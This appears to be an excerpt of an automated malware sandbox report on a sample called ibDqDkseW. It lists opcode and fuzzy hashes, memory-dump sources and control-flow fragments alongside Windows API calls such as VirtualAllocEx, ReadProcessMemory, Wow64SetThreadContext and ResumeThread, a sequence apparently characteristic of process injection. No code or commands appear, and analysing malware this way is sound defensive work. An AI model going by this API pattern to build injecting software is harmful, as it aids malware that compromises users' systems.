                          • Opcode ID: 0877b5bd3dd1b44e3c7c236b7acfecb6d690aacedbeaecc2d1fd496b8060f411
                          • Instruction ID: caef929053f4ba6ce95cd9488523ce03cac39e34c2fa5885b0ad1a86ef040d41
                          • Opcode Fuzzy Hash: 0877b5bd3dd1b44e3c7c236b7acfecb6d690aacedbeaecc2d1fd496b8060f411
                          • Instruction Fuzzy Hash: FF2159B19002098FDB10DFAAC5857EEBFF4EF88324F14842AD459A7241CB789A45CFA5
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0312D717
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 9631d5db38929e121d3ec90eb0a97dc7180127b6e3457c30e8577c8996a7fed2
                          • Instruction ID: efd1bbbe3d28dad1559930ea2263234614d87fd7d288b4e4ce822705c305f722
                          • Opcode Fuzzy Hash: 9631d5db38929e121d3ec90eb0a97dc7180127b6e3457c30e8577c8996a7fed2
                          • Instruction Fuzzy Hash: 5721E3B59002589FDB10CFAAD584ADEBFF9EB48324F14801AE918A7250D378A950CFA5
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AB81A8
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 2e6f21a638ad5919e42a4faf7b62926e9f55912d5b4730f0d2389e845236207a
                          • Instruction ID: a6daf3cc8f736a17f6567958aa19fce302300c57739043193860a4f430d9d79d
                          • Opcode Fuzzy Hash: 2e6f21a638ad5919e42a4faf7b62926e9f55912d5b4730f0d2389e845236207a
                          • Instruction Fuzzy Hash: 232139B18003599FDB10DFAAC944ADEFBF5FF88310F108429E559A7250C7799544CBA4
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AB7AE6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: b064801ac697d0e6c2a80b2ea3ce9221c6419befe6cfec043043f169823a678d
                          • Instruction ID: f64b2e69cb0610ced1152b610012bf82568ff8043facd1c8178707639dc0a7d6
                          • Opcode Fuzzy Hash: b064801ac697d0e6c2a80b2ea3ce9221c6419befe6cfec043043f169823a678d
                          • Instruction Fuzzy Hash: C4213AB19003098FDB10DFAAC4457EEBBF4EF88314F14842ED459A7241C7789544CFA5
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0312D717
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: c5145c21c308e764d79662f3885e8ad715c8ee8468d2c5242ada06635e969516
                          • Instruction ID: 17602bc0af233feaa495bd59d61f1e7eea4540cb45b6d27c021c4820cdb32829
                          • Opcode Fuzzy Hash: c5145c21c308e764d79662f3885e8ad715c8ee8468d2c5242ada06635e969516
                          • Instruction Fuzzy Hash: 9C21E4B59002589FDB10CFAAD584ADEFFF4FB48314F14801AE914A3350D378A950CFA4
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AB7FE6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 3c0b3d1f4f133adfa2246ea8431395f068a284d6772e3df20363f0a6b20e7119
                          • Instruction ID: 1cdcc493a20b479083988f4a217ec7dd7bf6ddfa646bc13ba72e2d76e62eb92e
                          • Opcode Fuzzy Hash: 3c0b3d1f4f133adfa2246ea8431395f068a284d6772e3df20363f0a6b20e7119
                          • Instruction Fuzzy Hash: 84116AB29002499FCB20DFAAC944BDEFFF5EF88320F20841AE515A7250CB75A540CFA4
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0312B079,00000800,00000000,00000000), ref: 0312B28A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: e48422a99160881152404c298e7f693af8e8fd82d34fe1a16842f8e0674ba26b
                          • Instruction ID: 4351187d0f3fd93a92469d1ffe1ad2fa0964ed4ce98b1a95bfed2d8b0a964342
                          • Opcode Fuzzy Hash: e48422a99160881152404c298e7f693af8e8fd82d34fe1a16842f8e0674ba26b
                          • Instruction Fuzzy Hash: 281123B69043188FDB20CF9AC544BDEFBF4EB88310F14842AE419A7610C375A944CFA4
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0312B079,00000800,00000000,00000000), ref: 0312B28A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: d394cea6c023c76416ad9ec72642f666d8cccd135aae87530c4e90af33e0778a
                          • Instruction ID: b45b658b673bddad4531da09dd8f6bcae32a960cab7d11f37c87fc5cf81d1fc9
                          • Opcode Fuzzy Hash: d394cea6c023c76416ad9ec72642f666d8cccd135aae87530c4e90af33e0778a
                          • Instruction Fuzzy Hash: 4B1123B6C003198FDB14CFAAC544ADEFBF4EB48310F14842AE819A7620C375A645CFA5
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AB7FE6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 2647b4fcd4f2c63dd547d7f097a68d6e7d64242f3e96a62088fb2f8ab29a4ede
                          • Instruction ID: c84daec9840519a3f80689ff3995731224104d2f179daeeed1082fda9deda766
                          • Opcode Fuzzy Hash: 2647b4fcd4f2c63dd547d7f097a68d6e7d64242f3e96a62088fb2f8ab29a4ede
                          • Instruction Fuzzy Hash: 241137B29002499FCB20DFAAC844BDEBFF5EF88320F10841AE559A7250CB75A544CFA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: ffd5e296c4ddaedf5a9b952bff07d32186ea6ad178550de5992a9df56f2d8dcf
                          • Instruction ID: 48224f6bbff9a56fb699f7973820c8bd8e99d1dacc6d99b41b72c8437a2f58a3
                          • Opcode Fuzzy Hash: ffd5e296c4ddaedf5a9b952bff07d32186ea6ad178550de5992a9df56f2d8dcf
                          • Instruction Fuzzy Hash: 4A116AB59003498FDB24DFAAC4447DEFFF4EB89324F24842AD459A7250CB75A944CFA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: b82f4ec7978744584505260abf5712d570e9ce8663071345a0b6e389ba09e23c
                          • Instruction ID: 8d741718955d5118898713c2bf0536ff80bc5615c26c2d66e37c9a73dc549236
                          • Opcode Fuzzy Hash: b82f4ec7978744584505260abf5712d570e9ce8663071345a0b6e389ba09e23c
                          • Instruction Fuzzy Hash: 0A1136B19003498FDB20DFAAC4457DEFBF8EB88324F20842AD459A7250CB75A944CFA4
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0312AFFE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 4c48c3a44e2bd8f6a1ad01440cd8dd116da28f7edbc6e58af41f30351be39165
                          • Instruction ID: ee4cdaf8616404cc66ff933edb90b106f6e547537a958fddad0a4054a6a3b1c3
                          • Opcode Fuzzy Hash: 4c48c3a44e2bd8f6a1ad01440cd8dd116da28f7edbc6e58af41f30351be39165
                          • Instruction Fuzzy Hash: 6E110CB6C002598FCB20CF9AC544ADEFBF4AF88324F14842AD829A7610D379A545CFA5
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07ABBD85
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 3d75a14b8ea55179cfd749dd6d1661928aee9553350b1dbc8d5b7e70cb036143
                          • Instruction ID: 479efb7b472f6418e070f003ba01737ec514fb1c152dd8545c5cd5f533521eb9
                          • Opcode Fuzzy Hash: 3d75a14b8ea55179cfd749dd6d1661928aee9553350b1dbc8d5b7e70cb036143
                          • Instruction Fuzzy Hash: 651133B5800348DFDB20DF8AC888BDEBBF8EB48320F108419E558A7600C379A940CFA0
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07ABBD85
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 729fe85d74a8659a7ccd0600b32d795a558733082411be165ff69edb379479ea
                          • Instruction ID: ec1985cb86e5d375b830fa956da87fa68380a0a31767d818bcee8e1c9d92b2bb
                          • Opcode Fuzzy Hash: 729fe85d74a8659a7ccd0600b32d795a558733082411be165ff69edb379479ea
                          • Instruction Fuzzy Hash: F91125B5800348DFCB10DF9AD445BDEBBF8EB48320F108419E458A3600C374A940CFA1
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac38069fcc6cce062b4d7830a36f11f4a9198e9b2dedc7684b73f032c6212477
                          • Instruction ID: ffb74c2b8b25d5fa0ba5f3b10706712a39b1356cfd8c9aae960e3a67e5c96ce1
                          • Opcode Fuzzy Hash: ac38069fcc6cce062b4d7830a36f11f4a9198e9b2dedc7684b73f032c6212477
                          • Instruction Fuzzy Hash: BE21F171504204DFDB06EF98D9D4B2ABF65FB88324F20C669EA094A296C336D416CBB1
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05394e4f69fa4714a628c55a2414c772a1ff4a8b4bf0157e01b7c31f4b5a5167
                          • Instruction ID: c6f0798584bc55ebdb9fcd61bee7ea69601a71e2d7949267d3d8f16f4eabef77
                          • Opcode Fuzzy Hash: 05394e4f69fa4714a628c55a2414c772a1ff4a8b4bf0157e01b7c31f4b5a5167
                          • Instruction Fuzzy Hash: 28210671500240DFDB05EF58D9C0F27BF65FB84318F20C66AD9054B296C336D456C6B2
                          Memory Dump Source
                          • Source File: 00000009.00000002.1805100770.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_169d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db814c801b325754a19b885dc8b0ac89a20924464f05213f28853ef47f13ae46
                          • Instruction ID: 42040218247c189165dbd63cc91efcc7c1d5b8561755fd0143b31e587246795d
                          • Opcode Fuzzy Hash: db814c801b325754a19b885dc8b0ac89a20924464f05213f28853ef47f13ae46
                          • Instruction Fuzzy Hash: 4F21D071604200DFDF15DF68D984B26BBA9EB84354F20C579D94A4B396C33AD447CA61
                          Memory Dump Source
                          • Source File: 00000009.00000002.1805100770.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_169d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b34452947167f32be14a4c58fc0e5cb5b1a4e59b41b260cdd178ac88361b5c48
                          • Instruction ID: b3674776dd66ceb2a519abc3434d2991a038f86c7d0155c1ed5c5fa1c13d4dc1
                          • Opcode Fuzzy Hash: b34452947167f32be14a4c58fc0e5cb5b1a4e59b41b260cdd178ac88361b5c48
                          • Instruction Fuzzy Hash: B1219F755083809FDB02CF64D994B11BFB5FB46314F24C5EAD8498F2A7C33A980ACB62
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                          • Instruction ID: b595a979f9156b11b01df36027a7b1e96d9d626122137853954844aef3b54133
                          • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                          • Instruction Fuzzy Hash: 4821E176404244CFDB06DF44D9C4B16BF72FB84324F24C2A9DD084B296C33AD42ACBA1
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                          • Instruction ID: 7c39f9d02efdfc9b08c86bafab707d263c3e51de72211900a3abaca7dd959bc9
                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                          • Instruction Fuzzy Hash: 5E11E172404280DFCB02DF54D9C4B16BF71FB84318F24C6AAD9090B656C336D45ACBB2
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 45ee0d60fd7cd29f222b202c5f904bbc8b408f72c8d2a9923738cdf64902b9a2
                          • Instruction ID: 409063bf499f08ab29957031f5589bc78a3449607cb150a23c7f81c64936058f
                          • Opcode Fuzzy Hash: 45ee0d60fd7cd29f222b202c5f904bbc8b408f72c8d2a9923738cdf64902b9a2
                          • Instruction Fuzzy Hash: 0601A771009384AAE7117A69CD84B77FFA8EF41324F18C629ED094B2D6C779D840C6B1
                          Memory Dump Source
                          • Source File: 00000009.00000002.1797519226.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_168d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a7a747a5b8bfa161a393aab9ad8bb17d3193fe236c7e539afdf1da94689cf45
                          • Instruction ID: e8181b63fc689d8110d582cde30cbae43fff113702e2135350257fea54aaefe5
                          • Opcode Fuzzy Hash: 6a7a747a5b8bfa161a393aab9ad8bb17d3193fe236c7e539afdf1da94689cf45
                          • Instruction Fuzzy Hash: 56F06271405384AAE7119A1ACD84B76FFA8EB81734F18C55AED085F6C6C3799844CAB1

                          Execution Graph

                          Execution Coverage: 0.1%
                          Dynamic/Decrypted Code Coverage: 100%
                          Signature Coverage: 0%
                          Total number of Nodes: 1
                          Total number of Limit Nodes: 0
                          execution_graph 62518 14d2c1d LdrInitializeThunk

                          Control-flow Graph

                          control_flow_graph 0 14d2c0a-14d2c0f 1 14d2c1f-14d2c26 LdrInitializeThunk 0->1 2 14d2c11-14d2c18 0->2
                          APIs
                          • LdrInitializeThunk.NTDLL(014EFD4F,000000FF,00000024,01586634,00000004,00000000,?,-00000018,7D810F61,?,?,014A8B12,?,?,?,?), ref: 014D2C24
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f8ae5896356ae3f87ab21b5b5589e9bf52b82235b74c8121b6c2d61e280c2663
                          • Instruction ID: 543f74786fda0cde33c29cbf5317488b15e053aef86460650445c62172085fb1
                          • Opcode Fuzzy Hash: f8ae5896356ae3f87ab21b5b5589e9bf52b82235b74c8121b6c2d61e280c2663
                          • Instruction Fuzzy Hash: 69B09B719015C5C5DE12E764460CB17794077D0701F15C063D3030653F4778C5D1E275

                          Control-flow Graph

                          control_flow_graph 5 14d2df0-14d2dfc LdrInitializeThunk
                          APIs
                          • LdrInitializeThunk.NTDLL(0150E73E,0000005A,0156D040,00000020,00000000,0156D040,00000080,014F4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,014DAE00), ref: 014D2DFA
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2d9cbbe61f3ef9114b26a9f6c01b7a160fefd9873d0501de19e569bc1e73f124
                          • Instruction ID: c737510b91e1b7e89261371536ec5b3999a9bc7d5fa4d6e2de1311f448afea87
                          • Opcode Fuzzy Hash: 2d9cbbe61f3ef9114b26a9f6c01b7a160fefd9873d0501de19e569bc1e73f124
                          • Instruction Fuzzy Hash: 8390023120140513D51171584508707004997E0242F95C453A0424559DD7668A52A221

                          Control-flow Graph

                          control_flow_graph 4 14d2c1d-14d2c26 LdrInitializeThunk
                          APIs
                          • LdrInitializeThunk.NTDLL(014EFD4F,000000FF,00000024,01586634,00000004,00000000,?,-00000018,7D810F61,?,?,014A8B12,?,?,?,?), ref: 014D2C24
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 44d0a923912f3442c620ca31f23fef1acd436f66e971861dc8eb0de1f0459d72
                          • Instruction ID: c6efe4434f4e12e400a536a37c7fefae65ca08dfceb11d10ec02bd3f829aa8b7
                          • Opcode Fuzzy Hash: 44d0a923912f3442c620ca31f23fef1acd436f66e971861dc8eb0de1f0459d72
                          • Instruction Fuzzy Hash: D1A00231401216578641EA18849456AB194BEE0215349C386D6864442A572414A1B6A2

                          Control-flow Graph

                          control_flow_graph 6 14d35c0-14d35cc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 162983488cf049a7db8ca1edf5ed068767f522f24aba1901f55ae90fb09ea255
                          • Instruction ID: 937af32f3c0875af5c617202bcbd3ca29800c882f6bee71cf376295130d622f7
                          • Opcode Fuzzy Hash: 162983488cf049a7db8ca1edf5ed068767f522f24aba1901f55ae90fb09ea255
                          • Instruction Fuzzy Hash: 5E90023160550502D50071584518706104597E0202F65C452A0424569DC7A58A5166A2

                          Control-flow Graph

                          control_flow_graph 7 42d000-42d01a 9 42d025-42d040 7->9 10 42d01c-42d024 7->10 9->10 12 42d042-42d08a call 42e683 call 42e633 9->12 17 42d08f-42d09d 12->17
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38d3599b24e04c04455723bad7906fc3437ea9deb6112700fda80e06c56e1c08
                          • Instruction ID: e1bad01d78eea3593c0e48f5639def0373a07c299f4d63162d710884237cd9e6
                          • Opcode Fuzzy Hash: 38d3599b24e04c04455723bad7906fc3437ea9deb6112700fda80e06c56e1c08
                          • Instruction Fuzzy Hash: 90110672B406156BD324DF55DC82FFBB379DF84314F54054EFA088A181EA74AA4287D8

                          Control-flow Graph

                          control_flow_graph 18 42e1e0-42e204 call 42e6d3 21 42e209-42e210 18->21 22 42e21f-42e224 21->22 23 42e226-42e22e 22->23 24 42e27e-42e283 22->24 25 42e22f 23->25 26 42e23e-42e243 25->26 27 42e256-42e27b 26->27 28 42e245-42e24d 26->28 27->24 29 42e253 28->29 29->27
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ceae1a592c5aa9c24b884000b4813f64f69adc33d5eca27968a78ae953d0f99
                          • Instruction ID: 14b503e4b4dbf4a94af14bba9f0082b6c658a07d39a71e0c42bec1849d99252b
                          • Opcode Fuzzy Hash: 2ceae1a592c5aa9c24b884000b4813f64f69adc33d5eca27968a78ae953d0f99
                          • Instruction Fuzzy Hash: 13015671D1032C56EB60FBA9AD42FD973B89B04304F4046DAB50CA6181FE74578CCF65

                          Control-flow Graph

                          control_flow_graph 32 42e1e3-42e224 call 42e6d3 36 42e226-42e243 32->36 37 42e27e-42e283 32->37 40 42e256-42e27b 36->40 41 42e245-42e24d 36->41 40->37 42 42e253 41->42 42->40
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e08184f4ac4478ee332d2b1b8cca028d09cfda6cc3f20e5c521ef6c3af75e5a
                          • Instruction ID: 127a4dcd22573884f948fd3c56ad155cbe9f07fd1aa0e13e2caf42441fe7631d
                          • Opcode Fuzzy Hash: 1e08184f4ac4478ee332d2b1b8cca028d09cfda6cc3f20e5c521ef6c3af75e5a
                          • Instruction Fuzzy Hash: 32015671D1032C56EB60FB999D42FD973B85B04304F4046DAB50CA6181EE74578CCF65

                          Control-flow Graph

                          control_flow_graph 45 42e594-42e5ce 46 42e5d4-42e5e5 45->46
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1cf5ac5d07dc1adbc98e8feca5841ebe62ac76af760b6f22fcdd76b91af82424
                          • Instruction ID: 468f0cba1bd46181291fbb9e0a631c89db09a513db55b99bad26aa58490c7061
                          • Opcode Fuzzy Hash: 1cf5ac5d07dc1adbc98e8feca5841ebe62ac76af760b6f22fcdd76b91af82424
